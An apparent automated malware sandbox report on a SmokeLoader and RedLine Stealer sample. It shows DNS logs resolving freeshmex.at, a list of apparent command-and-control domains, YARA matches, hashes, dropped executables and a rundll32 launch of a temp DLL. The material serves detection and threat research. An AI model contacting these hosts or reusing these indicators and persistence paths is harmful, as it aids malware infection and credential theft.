              Nov 24, 2022 20:13:27.964770079 CET8.8.8.8192.168.2.40x2c30No error (0)freeshmex.at211.40.39.251A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:27.964770079 CET8.8.8.8192.168.2.40x2c30No error (0)freeshmex.at189.153.246.161A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:27.964770079 CET8.8.8.8192.168.2.40x2c30No error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:27.964770079 CET8.8.8.8192.168.2.40x2c30No error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:27.964770079 CET8.8.8.8192.168.2.40x2c30No error (0)freeshmex.at31.166.130.113A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:27.964770079 CET8.8.8.8192.168.2.40x2c30No error (0)freeshmex.at109.102.255.230A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:27.964770079 CET8.8.8.8192.168.2.40x2c30No error (0)freeshmex.at211.53.230.67A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:27.964770079 CET8.8.8.8192.168.2.40x2c30No error (0)freeshmex.at95.107.163.44A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:27.964770079 CET8.8.8.8192.168.2.40x2c30No error (0)freeshmex.at211.171.233.129A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:29.219906092 CET8.8.8.8192.168.2.40xf846No error (0)freeshmex.at109.102.255.230A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:29.219906092 CET8.8.8.8192.168.2.40xf846No error (0)freeshmex.at211.53.230.67A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:29.219906092 CET8.8.8.8192.168.2.40xf846No error (0)freeshmex.at95.107.163.44A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:29.219906092 CET8.8.8.8192.168.2.40xf846No error (0)freeshmex.at211.171.233.129A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:29.219906092 CET8.8.8.8192.168.2.40xf846No error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:29.219906092 CET8.8.8.8192.168.2.40xf846No error (0)freeshmex.at211.40.39.251A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:29.219906092 CET8.8.8.8192.168.2.40xf846No error (0)freeshmex.at189.153.246.161A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:29.219906092 CET8.8.8.8192.168.2.40xf846No error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:29.219906092 CET8.8.8.8192.168.2.40xf846No error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:29.219906092 CET8.8.8.8192.168.2.40xf846No error (0)freeshmex.at31.166.130.113A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:29.651410103 CET8.8.8.8192.168.2.40x6a41No error (0)freeshmex.at211.53.230.67A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:29.651410103 CET8.8.8.8192.168.2.40x6a41No error (0)freeshmex.at95.107.163.44A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:29.651410103 CET8.8.8.8192.168.2.40x6a41No error (0)freeshmex.at211.171.233.129A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:29.651410103 CET8.8.8.8192.168.2.40x6a41No error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:29.651410103 CET8.8.8.8192.168.2.40x6a41No error (0)freeshmex.at211.40.39.251A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:29.651410103 CET8.8.8.8192.168.2.40x6a41No error (0)freeshmex.at189.153.246.161A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:29.651410103 CET8.8.8.8192.168.2.40x6a41No error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:29.651410103 CET8.8.8.8192.168.2.40x6a41No error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:29.651410103 CET8.8.8.8192.168.2.40x6a41No error (0)freeshmex.at31.166.130.113A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:29.651410103 CET8.8.8.8192.168.2.40x6a41No error (0)freeshmex.at109.102.255.230A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:30.784167051 CET8.8.8.8192.168.2.40x76faNo error (0)freeshmex.at211.171.233.129A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:30.784167051 CET8.8.8.8192.168.2.40x76faNo error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:30.784167051 CET8.8.8.8192.168.2.40x76faNo error (0)freeshmex.at211.40.39.251A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:30.784167051 CET8.8.8.8192.168.2.40x76faNo error (0)freeshmex.at189.153.246.161A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:30.784167051 CET8.8.8.8192.168.2.40x76faNo error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:30.784167051 CET8.8.8.8192.168.2.40x76faNo error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:30.784167051 CET8.8.8.8192.168.2.40x76faNo error (0)freeshmex.at31.166.130.113A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:30.784167051 CET8.8.8.8192.168.2.40x76faNo error (0)freeshmex.at109.102.255.230A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:30.784167051 CET8.8.8.8192.168.2.40x76faNo error (0)freeshmex.at211.53.230.67A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:30.784167051 CET8.8.8.8192.168.2.40x76faNo error (0)freeshmex.at95.107.163.44A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:32.024302959 CET8.8.8.8192.168.2.40xfed9No error (0)freeshmex.at211.53.230.67A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:32.024302959 CET8.8.8.8192.168.2.40xfed9No error (0)freeshmex.at95.107.163.44A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:32.024302959 CET8.8.8.8192.168.2.40xfed9No error (0)freeshmex.at211.171.233.129A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:32.024302959 CET8.8.8.8192.168.2.40xfed9No error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:32.024302959 CET8.8.8.8192.168.2.40xfed9No error (0)freeshmex.at211.40.39.251A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:32.024302959 CET8.8.8.8192.168.2.40xfed9No error (0)freeshmex.at189.153.246.161A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:32.024302959 CET8.8.8.8192.168.2.40xfed9No error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:32.024302959 CET8.8.8.8192.168.2.40xfed9No error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:32.024302959 CET8.8.8.8192.168.2.40xfed9No error (0)freeshmex.at31.166.130.113A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:32.024302959 CET8.8.8.8192.168.2.40xfed9No error (0)freeshmex.at109.102.255.230A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:33.421724081 CET8.8.8.8192.168.2.40x8cadNo error (0)freeshmex.at95.107.163.44A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:33.421724081 CET8.8.8.8192.168.2.40x8cadNo error (0)freeshmex.at211.171.233.129A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:33.421724081 CET8.8.8.8192.168.2.40x8cadNo error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:33.421724081 CET8.8.8.8192.168.2.40x8cadNo error (0)freeshmex.at211.40.39.251A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:33.421724081 CET8.8.8.8192.168.2.40x8cadNo error (0)freeshmex.at189.153.246.161A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:33.421724081 CET8.8.8.8192.168.2.40x8cadNo error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:33.421724081 CET8.8.8.8192.168.2.40x8cadNo error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:33.421724081 CET8.8.8.8192.168.2.40x8cadNo error (0)freeshmex.at31.166.130.113A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:33.421724081 CET8.8.8.8192.168.2.40x8cadNo error (0)freeshmex.at109.102.255.230A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:33.421724081 CET8.8.8.8192.168.2.40x8cadNo error (0)freeshmex.at211.53.230.67A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:33.736593008 CET8.8.8.8192.168.2.40xddb5No error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:33.736593008 CET8.8.8.8192.168.2.40xddb5No error (0)freeshmex.at31.166.130.113A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:33.736593008 CET8.8.8.8192.168.2.40xddb5No error (0)freeshmex.at109.102.255.230A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:33.736593008 CET8.8.8.8192.168.2.40xddb5No error (0)freeshmex.at211.53.230.67A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:33.736593008 CET8.8.8.8192.168.2.40xddb5No error (0)freeshmex.at95.107.163.44A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:33.736593008 CET8.8.8.8192.168.2.40xddb5No error (0)freeshmex.at211.171.233.129A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:33.736593008 CET8.8.8.8192.168.2.40xddb5No error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:33.736593008 CET8.8.8.8192.168.2.40xddb5No error (0)freeshmex.at211.40.39.251A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:33.736593008 CET8.8.8.8192.168.2.40xddb5No error (0)freeshmex.at189.153.246.161A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:33.736593008 CET8.8.8.8192.168.2.40xddb5No error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:34.258749962 CET8.8.8.8192.168.2.40xe7fcNo error (0)freeshmex.at95.107.163.44A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:34.258749962 CET8.8.8.8192.168.2.40xe7fcNo error (0)freeshmex.at211.171.233.129A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:34.258749962 CET8.8.8.8192.168.2.40xe7fcNo error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:34.258749962 CET8.8.8.8192.168.2.40xe7fcNo error (0)freeshmex.at211.40.39.251A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:34.258749962 CET8.8.8.8192.168.2.40xe7fcNo error (0)freeshmex.at189.153.246.161A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:34.258749962 CET8.8.8.8192.168.2.40xe7fcNo error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:34.258749962 CET8.8.8.8192.168.2.40xe7fcNo error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:34.258749962 CET8.8.8.8192.168.2.40xe7fcNo error (0)freeshmex.at31.166.130.113A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:34.258749962 CET8.8.8.8192.168.2.40xe7fcNo error (0)freeshmex.at109.102.255.230A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:34.258749962 CET8.8.8.8192.168.2.40xe7fcNo error (0)freeshmex.at211.53.230.67A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:34.668950081 CET8.8.8.8192.168.2.40xc9b3No error (0)freeshmex.at109.102.255.230A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:34.668950081 CET8.8.8.8192.168.2.40xc9b3No error (0)freeshmex.at211.53.230.67A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:34.668950081 CET8.8.8.8192.168.2.40xc9b3No error (0)freeshmex.at95.107.163.44A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:34.668950081 CET8.8.8.8192.168.2.40xc9b3No error (0)freeshmex.at211.171.233.129A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:34.668950081 CET8.8.8.8192.168.2.40xc9b3No error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:34.668950081 CET8.8.8.8192.168.2.40xc9b3No error (0)freeshmex.at211.40.39.251A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:34.668950081 CET8.8.8.8192.168.2.40xc9b3No error (0)freeshmex.at189.153.246.161A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:34.668950081 CET8.8.8.8192.168.2.40xc9b3No error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:34.668950081 CET8.8.8.8192.168.2.40xc9b3No error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:34.668950081 CET8.8.8.8192.168.2.40xc9b3No error (0)freeshmex.at31.166.130.113A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:35.443448067 CET8.8.8.8192.168.2.40x5996No error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:35.443448067 CET8.8.8.8192.168.2.40x5996No error (0)freeshmex.at211.40.39.251A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:35.443448067 CET8.8.8.8192.168.2.40x5996No error (0)freeshmex.at189.153.246.161A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:35.443448067 CET8.8.8.8192.168.2.40x5996No error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:35.443448067 CET8.8.8.8192.168.2.40x5996No error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:35.443448067 CET8.8.8.8192.168.2.40x5996No error (0)freeshmex.at31.166.130.113A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:35.443448067 CET8.8.8.8192.168.2.40x5996No error (0)freeshmex.at109.102.255.230A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:35.443448067 CET8.8.8.8192.168.2.40x5996No error (0)freeshmex.at211.53.230.67A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:35.443448067 CET8.8.8.8192.168.2.40x5996No error (0)freeshmex.at95.107.163.44A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:35.443448067 CET8.8.8.8192.168.2.40x5996No error (0)freeshmex.at211.171.233.129A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:37.534168005 CET8.8.8.8192.168.2.40xd9bbNo error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:37.534168005 CET8.8.8.8192.168.2.40xd9bbNo error (0)freeshmex.at31.166.130.113A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:37.534168005 CET8.8.8.8192.168.2.40xd9bbNo error (0)freeshmex.at109.102.255.230A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:37.534168005 CET8.8.8.8192.168.2.40xd9bbNo error (0)freeshmex.at211.53.230.67A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:37.534168005 CET8.8.8.8192.168.2.40xd9bbNo error (0)freeshmex.at95.107.163.44A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:37.534168005 CET8.8.8.8192.168.2.40xd9bbNo error (0)freeshmex.at211.171.233.129A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:37.534168005 CET8.8.8.8192.168.2.40xd9bbNo error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:37.534168005 CET8.8.8.8192.168.2.40xd9bbNo error (0)freeshmex.at211.40.39.251A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:37.534168005 CET8.8.8.8192.168.2.40xd9bbNo error (0)freeshmex.at189.153.246.161A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:37.534168005 CET8.8.8.8192.168.2.40xd9bbNo error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:38.022118092 CET8.8.8.8192.168.2.40xbba5No error (0)freeshmex.at211.171.233.129A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:38.022118092 CET8.8.8.8192.168.2.40xbba5No error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:38.022118092 CET8.8.8.8192.168.2.40xbba5No error (0)freeshmex.at211.40.39.251A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:38.022118092 CET8.8.8.8192.168.2.40xbba5No error (0)freeshmex.at189.153.246.161A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:38.022118092 CET8.8.8.8192.168.2.40xbba5No error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:38.022118092 CET8.8.8.8192.168.2.40xbba5No error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:38.022118092 CET8.8.8.8192.168.2.40xbba5No error (0)freeshmex.at31.166.130.113A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:38.022118092 CET8.8.8.8192.168.2.40xbba5No error (0)freeshmex.at109.102.255.230A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:38.022118092 CET8.8.8.8192.168.2.40xbba5No error (0)freeshmex.at211.53.230.67A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:38.022118092 CET8.8.8.8192.168.2.40xbba5No error (0)freeshmex.at95.107.163.44A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:39.568480968 CET8.8.8.8192.168.2.40x99a5No error (0)freeshmex.at95.107.163.44A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:39.568480968 CET8.8.8.8192.168.2.40x99a5No error (0)freeshmex.at211.171.233.129A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:39.568480968 CET8.8.8.8192.168.2.40x99a5No error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:39.568480968 CET8.8.8.8192.168.2.40x99a5No error (0)freeshmex.at211.40.39.251A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:39.568480968 CET8.8.8.8192.168.2.40x99a5No error (0)freeshmex.at189.153.246.161A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:39.568480968 CET8.8.8.8192.168.2.40x99a5No error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:39.568480968 CET8.8.8.8192.168.2.40x99a5No error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:39.568480968 CET8.8.8.8192.168.2.40x99a5No error (0)freeshmex.at31.166.130.113A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:39.568480968 CET8.8.8.8192.168.2.40x99a5No error (0)freeshmex.at109.102.255.230A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:39.568480968 CET8.8.8.8192.168.2.40x99a5No error (0)freeshmex.at211.53.230.67A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:39.828243017 CET8.8.8.8192.168.2.40xbafcNo error (0)freeshmex.at109.102.255.230A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:39.828243017 CET8.8.8.8192.168.2.40xbafcNo error (0)freeshmex.at211.53.230.67A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:39.828243017 CET8.8.8.8192.168.2.40xbafcNo error (0)freeshmex.at95.107.163.44A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:39.828243017 CET8.8.8.8192.168.2.40xbafcNo error (0)freeshmex.at211.171.233.129A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:39.828243017 CET8.8.8.8192.168.2.40xbafcNo error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:39.828243017 CET8.8.8.8192.168.2.40xbafcNo error (0)freeshmex.at211.40.39.251A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:39.828243017 CET8.8.8.8192.168.2.40xbafcNo error (0)freeshmex.at189.153.246.161A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:39.828243017 CET8.8.8.8192.168.2.40xbafcNo error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:39.828243017 CET8.8.8.8192.168.2.40xbafcNo error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:39.828243017 CET8.8.8.8192.168.2.40xbafcNo error (0)freeshmex.at31.166.130.113A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:40.226567030 CET8.8.8.8192.168.2.40xe142No error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:40.226567030 CET8.8.8.8192.168.2.40xe142No error (0)freeshmex.at211.40.39.251A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:40.226567030 CET8.8.8.8192.168.2.40xe142No error (0)freeshmex.at189.153.246.161A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:40.226567030 CET8.8.8.8192.168.2.40xe142No error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:40.226567030 CET8.8.8.8192.168.2.40xe142No error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:40.226567030 CET8.8.8.8192.168.2.40xe142No error (0)freeshmex.at31.166.130.113A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:40.226567030 CET8.8.8.8192.168.2.40xe142No error (0)freeshmex.at109.102.255.230A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:40.226567030 CET8.8.8.8192.168.2.40xe142No error (0)freeshmex.at211.53.230.67A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:40.226567030 CET8.8.8.8192.168.2.40xe142No error (0)freeshmex.at95.107.163.44A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:40.226567030 CET8.8.8.8192.168.2.40xe142No error (0)freeshmex.at211.171.233.129A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:41.322443962 CET8.8.8.8192.168.2.40xf858No error (0)freeshmex.at109.102.255.230A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:41.322443962 CET8.8.8.8192.168.2.40xf858No error (0)freeshmex.at211.53.230.67A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:41.322443962 CET8.8.8.8192.168.2.40xf858No error (0)freeshmex.at95.107.163.44A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:41.322443962 CET8.8.8.8192.168.2.40xf858No error (0)freeshmex.at211.171.233.129A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:41.322443962 CET8.8.8.8192.168.2.40xf858No error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:41.322443962 CET8.8.8.8192.168.2.40xf858No error (0)freeshmex.at211.40.39.251A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:41.322443962 CET8.8.8.8192.168.2.40xf858No error (0)freeshmex.at189.153.246.161A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:41.322443962 CET8.8.8.8192.168.2.40xf858No error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:41.322443962 CET8.8.8.8192.168.2.40xf858No error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:41.322443962 CET8.8.8.8192.168.2.40xf858No error (0)freeshmex.at31.166.130.113A (IP address)IN (0x0001)false
              • thepokeway.nl
              • crimlvf.net
                • freeshmex.at
              • hdnuetf.net
              • jccvg.com
              • fjuand.org
              • ugahgtu.net
              • 123.253.32.170
              • cbcxtvmmly.net
              • jmhsk.org
              • cxmexebq.com
              • yvudclyoxi.net
              • ewydclhcm.com
              • ufwbup.com
              • dmwhplnj.com
              • xrqcl.com
              • uuvtnsw.net
              • fffclev.com
              • ykhdc.net
              • qhcqdle.org
              • bussc.com
              • rfiijpjae.org
              • bowsudmxn.org
              • slkwmgvhmh.org
              • bpaefk.com
              • uaymxpjge.org
              • wfwtjemoof.com
              • rpaquepn.com
              • uphkrwii.org
              • mifwrnveyh.net
              • motvx.net
              • bfgpwwck.net
              • agqugnol.org
              • gxxlrwdw.net
              • jhiornjar.org
              • sloljasy.net
              • yrxav.net

              Click to jump to process

              Target ID:0
              Start time:20:12:03
              Start date:24/11/2022
              Path:C:\Users\user\Desktop\file.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user\Desktop\file.exe
              Imagebase:0x400000
              File size:192000 bytes
              MD5 hash:44C87D3BC316EEFE4DCBF66AFED72ABC
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.389281355.0000000002260000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.389322444.0000000002270000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.389322444.0000000002270000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.389380417.0000000002291000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.389380417.0000000002291000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
              • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.389150563.00000000007D9000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
              Reputation:low

              Target ID:1
              Start time:20:12:11
              Start date:24/11/2022
              Path:C:\Windows\explorer.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\Explorer.EXE
              Imagebase:0x7ff618f60000
              File size:3933184 bytes
              MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000000.373140844.0000000004631000.00000020.80000000.00040000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000001.00000000.373140844.0000000004631000.00000020.80000000.00040000.00000000.sdmp, Author: unknown
              Reputation:high

              Target ID:4
              Start time:20:13:01
              Start date:24/11/2022
              Path:C:\Users\user\AppData\Roaming\gfgsrbs
              Wow64 process (32bit):true
              Commandline:C:\Users\user\AppData\Roaming\gfgsrbs
              Imagebase:0x400000
              File size:192000 bytes
              MD5 hash:44C87D3BC316EEFE4DCBF66AFED72ABC
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.439850866.00000000007B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000004.00000002.439850866.00000000007B0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
              • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000004.00000002.439838809.00000000007A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.439945899.00000000022B1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000004.00000002.439945899.00000000022B1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
              • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000004.00000002.439756296.00000000006A8000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
              Antivirus matches:
              • Detection: 100%, Joe Sandbox ML
              Reputation:low

              Target ID:5
              Start time:20:13:12
              Start date:24/11/2022
              Path:C:\Users\user\AppData\Local\Temp\B87E.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user\AppData\Local\Temp\B87E.exe
              Imagebase:0x400000
              File size:1041408 bytes
              MD5 hash:1BD9FB4ADE498938E6432D6C5D1E23A5
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000005.00000002.465675334.00000000025D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
              • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000005.00000002.464999094.00000000023E8000.00000040.00000800.00020000.00000000.sdmp, Author: unknown
              Antivirus matches:
              • Detection: 100%, Joe Sandbox ML
              Reputation:low

              Target ID:6
              Start time:20:13:19
              Start date:24/11/2022
              Path:C:\Windows\SysWOW64\rundll32.exe
              Wow64 process (32bit):true
              Commandline:"C:\Windows\system32\rundll32.exe" "C:\Users\user\AppData\Local\Temp\Tdryuqayh.tmp",Worhdhqfpryr
